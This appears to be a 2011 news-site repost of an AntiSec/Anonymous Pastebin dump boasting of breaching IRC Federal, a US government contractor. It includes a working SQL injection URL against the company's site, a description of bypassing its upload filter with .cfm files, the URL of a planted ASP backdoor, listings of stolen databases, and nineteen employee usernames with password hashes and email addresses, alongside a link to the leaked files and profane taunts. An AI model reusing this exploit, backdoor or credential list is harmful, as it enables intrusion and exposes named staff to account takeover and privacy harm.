Anonymous Hacks FBI Contractors IRC Federal
The Hacker News


Anonymous Hackers today leak some files of IRC Federal via a tweet. They've gotten access to contracts, internal documents, development schematics, logins and more. The Download Link released by Anonymous is https://www.mediafire.com/?twxc1nhiluwr126#1 ,106.91 MB. Mirror also available now on Torrent.

Anonymous Said "If you place any value on freedom, then stop working for the oligarchy and start working against it. Stop aiding the corporations and a government which uses unethical means to corner vast amounts of wealth and proceed to flagrantly abuse their power. Together, we have the power to change this world for the better.".

The Complete Release on Pastebin as shown Below :

``` : h0 yyyh `
:0yyhhh 0 0 : hhy00: `
: 0hhh :: : y 0y 0000 :`
`: 000hh : ` : 0hh : 00yy :`
hh0: ` : :h00hh0:
`` y : : : hh0 `
h0 : : ` ` : : 0 : : hyy:`
` h0 : ` 0: ` : hh
` 0h0: : : : 0h0 0hh000 0 : 0 :::0 :: :: y `
`hh: : : : : : :: : 0 : :: h 0h: yh
y : :: :: : 0 h0
h : : 00 : ::: :::: : : 0 y0
yh : 0 : :: ::0h 0 00y : : : hy
y 00 ::: :: : : : y : : hy : ::: yyh `
hyhyy : : : :: hh : :0yh ::: :::: hyh:`
: 0 :::: : :: :: :y0:: : :h0: : :::: hyy0 0h00hhyh
000 000yy :: ::: y : hyh0hhh0hh0 : 0hyh :`
` 0hhhhhyh00hhh: : h :`
```` : 00
0 : : h:
0:: h
` 0 : h `
` : : h: :0 `
yh : : : ::0 0: : : 0 `
` h 00 :: :::: :: : : 0hyh
`: yhh0hyh0 0 hhh0 `
0 :h
`h:: 0
`0::::h
` 0: ::y:`
hhy0: ::yyhy0
` ` 0 0yh :hh0 y: ` ``
::0 000 : : 0hy hyhhyyh `
`: 0 0 0: : : : h0: ::: 0hh
:: ` : 0h: :::: :: 00 : 00 0 : ::: 0hh : :`
` h 0 :::: : : :: : :::: :: : 00hh 0 hh


################################################################################
### #ANTISEC LAYING NUCLEAR WASTE TO MILITARY AND WHITE HAT BOXES SINCE 2011 ###
# FOR OFFICIAL UNDERGROUND USE ONLY # FUCK LOIC & LOIC-KIDS # FUCK BARRETBROWN #
################################################################################
_ _ __ __
__| || |__ _____ _____/ |_|__| ______ ____ ____
\ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #anonymous
| || | / __ \| | \ | | |\___ \\ ___/\ \___ #whiteh8
/_ ~~ _\ (____ /___| /__| |__/____ \\___ \ \___ | #antisec
|_||_| \/ \/ \/ \/ \/


################################################################################
roses are red, violets are blue,
we hate whitehats, and you do too!
################################################################################


Today we release the ownage of another government-contracted IT company, IRC
Federal. They brag about their multi-million dollar partnership with the FBI,
Army, Navy, NASA, and the Department of Justice, selling out their "skills" to
the US empire. So we laid nuclear waste to their systems, owning their pathetic
windows box, dropping their databases and private emails, and defaced their
professional looking website.


In their emails we found various contracts, development schematics, and internal
documents for various government institutions including a proposal for the FBI
to develop a "Special Identities Modernization (SIM) Project" to "reduce
terrorist and criminal activity by protecting all records associated with
trusted individuals and revealing the identities of those individuals who may
pose serious risk to the United States and its allies". We also found
fingerprinting contracts for the DOJ, biometrics development for the military,
and strategy contracts for the "National Nuclear Security Administration
Nuclear Weapons Complex".


Additionally we found login info to various VPNs and several Department of
Energy login access panels that we are dumping *live* complete with some URLs
to live ASP file browser and upload backdoors - let's see how long it takes for
them to remove it (don't worry we'll keep putting it back up until they pull
the box ;D)


Before we begin the drop, a personal message to the employees of IRC Federal:


If you place any value on freedom, then stop working for the oligarchy
and start working against it. Stop aiding the corporations and a government
which uses unethical means to corner vast amounts of wealth and proceed
to flagrantly abuse their power. Together, we have the power to change
this world for the better.


"He who passively accepts evil is as much involved in it as he who helps
to perpetuate it." –Martin Luther King, Jr.


Props to our black hat and antisec comrades: bantown, dikline,
h0no, phrack high council, ~el8 and all you kick-ass motherfuckers
we've never even heard of. Thank you.




################################################################################
## own & rm # own & rm # own & rm # own & rm # own & rm # own & rm # own & rm ##
################################################################################


ello ej33t hax0urz! We decided to throw in a little bonus for those of you that
sojourned through this boring-ass document to give you a little taste (and
hopefully some ideas!) of how this went down.


Before you Adrian Lamo-type el33t (lololol !!!) hackers get sticks up your
asses, just keep the previous doc in mind and remember: even if all you can do
is sql injection, you're still ~300% more talented than most grandmas!
h0h00h0h0!!! (srsly tho)


https://www.ircfederal.com/news_display.asp?ID=-1%20union%20select%201,username,
mynumber,1%20FROM%20logins%20WHERE%20username%20%3C%3E%20%27bhunt%27


# admin login!


Once we had the admin login, there was a script to upload images. They had
blacklisted extensions (note to self: a whitelist would be more appropriate
here!), that disallowed ASP among others. What they didn't check for was .cfm


There were a few others as well. There was an internal phpbb database that we
downloaded and cracked and got some email passwords.


So now you know! Protect your shit and keepz it realz!


################################################################################
## own & rm # own & rm # own & rm # own & rm # own & rm # own & rm # own & rm ##
################################################################################


file browse:
file upload: https://ircfederal.com/data/x.asp


Directory of C:\


07/04/2011 11:20 PM <DIR> .
07/04/2011 11:20 PM <DIR> ..
07/04/2011 08:00 PM <DIR> Backup
07/04/2011 08:00 PM <DIR> CAConfig
07/04/2011 08:00 PM <DIR> CFUSION
07/04/2011 08:00 PM <DIR> Documents and Settings
07/04/2011 08:00 PM <DIR> IIS-Aid
07/04/2011 08:00 PM <DIR> Inetpub
07/04/2011 08:00 PM <DIR> IOGA_2010
07/04/2011 08:00 PM <DIR> old sites moved to air
07/04/2011 08:00 PM <DIR> PHP
07/04/2011 08:00 PM <DIR> Program Files
07/04/2011 08:00 PM <DIR> Projects
07/04/2011 08:00 PM <DIR> RECYCLER
07/04/2011 08:00 PM <DIR> System Volume Information
07/04/2011 08:00 PM <DIR> usr
07/04/2011 08:00 PM <DIR> vbroker
07/04/2011 08:00 PM <DIR> VxPushRA
07/04/2011 08:00 PM <DIR> webdatabases
07/04/2011 08:00 PM <DIR> WebSites
07/04/2011 08:00 PM <DIR> WINNT
07/04/2011 08:00 PM <DIR> WUTemp




Directory of downloads/


07/02/2011 02:41 AM <DIR> .
07/02/2011 02:41 AM <DIR> ..
07/02/2011 02:56 AM <DIR> webdatabases
07/02/2011 03:12 AM 614,400 inventory.mdb
07/02/2011 03:21 AM 10,358,784 irc_site.mdb
07/02/2011 04:24 AM 1,396,224 IRC-VPN.doc
07/02/2011 03:25 AM 675,840 jubileewv.mdb
07/02/2011 03:26 AM 675,840 landmark.mdb
07/02/2011 03:26 AM 671,744 lccc.mdb
07/02/2011 03:31 AM 8,257,536 LWV.mdb
07/02/2011 03:43 AM 3,813,376 MantechLPM.mdb
07/02/2011 03:48 AM 11,272,192 MorgantownWeb.mdb
07/02/2011 03:50 AM 5,109,448 mpc_data.mdb
07/02/2011 03:51 AM 1,662,976 new_irc.mdb
07/02/2011 03:28 AM 7,020,544 newclass.mdb
07/02/2011 03:55 AM 638,976 SJMH.mdb
07/02/2011 03:45 AM 974,848 student.mdb
07/02/2011 03:44 AM 466,944 student2.mdb
07/02/2011 03:56 AM 106,496 survey.mdb
07/02/2011 03:57 AM 774,144 teachers.mdb
07/02/2011 04:00 AM 856,064 truly.mdb
07/02/2011 04:02 AM 151,552 Vaees.mdb
07/02/2011 04:02 AM 1,138,688 victory_cat.mdb
07/02/2011 04:03 AM 122,880 WeeklyActivityReport.mdb
07/02/2011 04:03 AM 64 weston.ldb
07/02/2011 04:04 AM 3,960,832 weston.mdb
07/02/2011 04:04 AM 3,960,832 weston1.mdb
07/02/2011 04:05 AM 3,960,832 weston2.mdb
07/02/2011 04:06 AM 1,883,668 wmdgear.mdb
07/02/2011 04:09 AM 1,134,592 wvantiquemarket.mdb
07/02/2011 04:18 AM 765,952 WVEDC_Members.mdb
07/02/2011 04:19 AM 966,656 wvstore.mdb
07/02/2011 04:18 AM 319,488 electric.mdb
07/04/2011 06:11 PM 1,073,152 enterprise_modeling.mdb
07/02/2011 04:03 AM 405,504 feedback.mdb
07/02/2011 04:02 AM 327,680 house.mdb
07/02/2011 03:23 AM 790,528 industrial.mdb
34 File(s) 76,309,276 bytes




Directory of downloads/webdatabases


07/02/2011 02:56 AM <DIR> .
07/02/2011 02:56 AM <DIR> ..
07/02/2011 02:54 AM 14,290,944 allee_catalog.mdb
07/02/2011 02:55 AM 155,648 bea-log.mdb
07/02/2011 02:55 AM 811,008 catherine_miller.mdb
07/02/2011 02:55 AM 167,936 cityofweston.mdb
07/02/2011 02:08 AM 9,437,184 ircfederal.mdb
07/02/2011 02:53 AM 2,084,864 adoptafriend.mdb
07/02/2011 02:56 AM 300 WS_FTP.LOG
07/02/2011 02:57 AM 2,166,784 fghi.mdb
07/02/2011 02:58 AM <DIR> intranet
07/02/2011 03:12 AM 614,400 inventory.mdb
9 File(s) 29,729,068 bytes


Directory of downloads/webdatabases/intranet


07/02/2011 02:58 AM <DIR> .
07/02/2011 02:58 AM <DIR> ..
07/02/2011 03:04 AM 1,044,480 Intranet_Forum.mdb
07/02/2011 02:58 AM 69 intra.7z
07/02/2011 03:04 AM 0 intra.mdb
07/02/2011 03:04 AM 1,155,892 Intra.zip
07/02/2011 03:06 AM 11,272,192 intra_4-17.mdb
07/02/2011 03:11 AM 18,403,328 test_intra.mdb
07/04/2011 08:00 PM 64 Intranet_Forum.ldb
7 File(s) 31,876,025 bytes




################################################################################
==== Intranet_Forum.mdb ====
################################################################################
Thanks for installing the most insecure piece of shit forum on Earth
in your intranet - phpbb <3


sjohnson:2dfe5eec4b54cec609cf709b824630e5:sjohnson@ircwv.com
bhunt:17c47e3d330a684adb207c25190fdd01:bhunt@ircwv.com
kbelt:7fc35b06d610ee50bcb2e4c0751e8bdd:kbelt@ircwv.com
lmick:1abae2c527b80ebae05cd93670639707:lmick@ircwv.com
strefz:c5333176e2e62d40b29b520e30b753e1:strefz@ircwv.com
tuldrich:6845f32f1a73b387ab81924211db9835:tuldrich@ircwv.com
jmoore:3c5403d0df84733d1dc0323ca6e36325:jmoore@ircwv.com
bwentz:792be28a852fab3f6fb673dccf8dde98:bwentz@ircwv.com
ebrown:5e1adbeb0be073ebe835683880efb9cf:ebrown@ircwv.com
bwilliams:06a5fcae55d72a3cc92a27bc4cd5475e:bwilliams@ircwv.com
bgolden:35c08970ea65272a32d3a2eee3d382ed:bgolden@ircwv.com
srobertson:3b8acbb030bb9051da253731bae6ae12:srobertson@ircwv.com
sguinn:d6919e90f8e55fc227248be2d7d74182:sguinn@ircwv.com
jturner:58d3e64b4842c724bdb768be4ab8a90c:jturner@ircwv.com
smealey:3fbc778e075349ffac5e37b81031878a:smealey@ircwv.com
alane:a0b0ddd608e3e812470a57952195a43d:alane@ircwv.com
jsmith:1831ee85c424301c1d971e1f528db528:jsmith@critical1.com
swhite:dfbaf054abb3457b2447c1aca9acb4dd:Steven.White@ircwv.com
gstine:105ae5fb0f09f6af2c2c9cb735dc24e5:gstine@ircwv.com


Out of 6 that cracked in a reasonable time, two actually
doubled as their emails. Really guys?


Directory of ircf/bhunt


07/04/2011 05:34 PM <DIR> .
07/04/2011 05:34 PM <DIR> ..
07/04/2011 05:25 PM 258,048 144978-SOL-001-003_Draft-Bob-07-01-11.xls
07/04/2011 05:27 PM 39,805 Contractor Job Listings-WV_updated as of
063011.xlsx
07/04/2011 05:27 PM 15,348 Jun 2011 work Schedule.xlsx
07/04/2011 05:24 PM 17,353 M 3_MS_COMPLIANCE_MATRIX rev bgd.docx
07/04/2011 05:30 PM 286,124 msg0033.wav
07/04/2011 05:28 PM 363,884 msg0041.wav
07/04/2011 05:28 PM 381,164 msg0042.wav
07/04/2011 05:21 PM 2,040,373 Scanned from the Weston Xerox001(1).pdf
07/04/2011 05:21 PM 416,658 Scanned from the Weston Xerox001(2).pdf
07/04/2011 05:22 PM 2,081,373 Scanned from the Weston Xerox001(3).pdf
07/04/2011 05:22 PM 156,031 Scanned from the Weston Xerox001(4).pdf
07/04/2011 05:23 PM 147,533 Scanned from the Weston Xerox001(5).pdf
07/04/2011 05:20 PM 2,089,268 Scanned from the Weston Xerox001.pdf
07/04/2011 05:25 PM 176,640 SWAT_Cost_Volume_Draft_Bob-07-01-11.doc
07/04/2011 05:25 PM 1,219,706
SWAT_Volume_II_Mission_Suitability_Volume_Final_BH - bgd rev.docx
15 File(s) 9,689,308 bytes
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.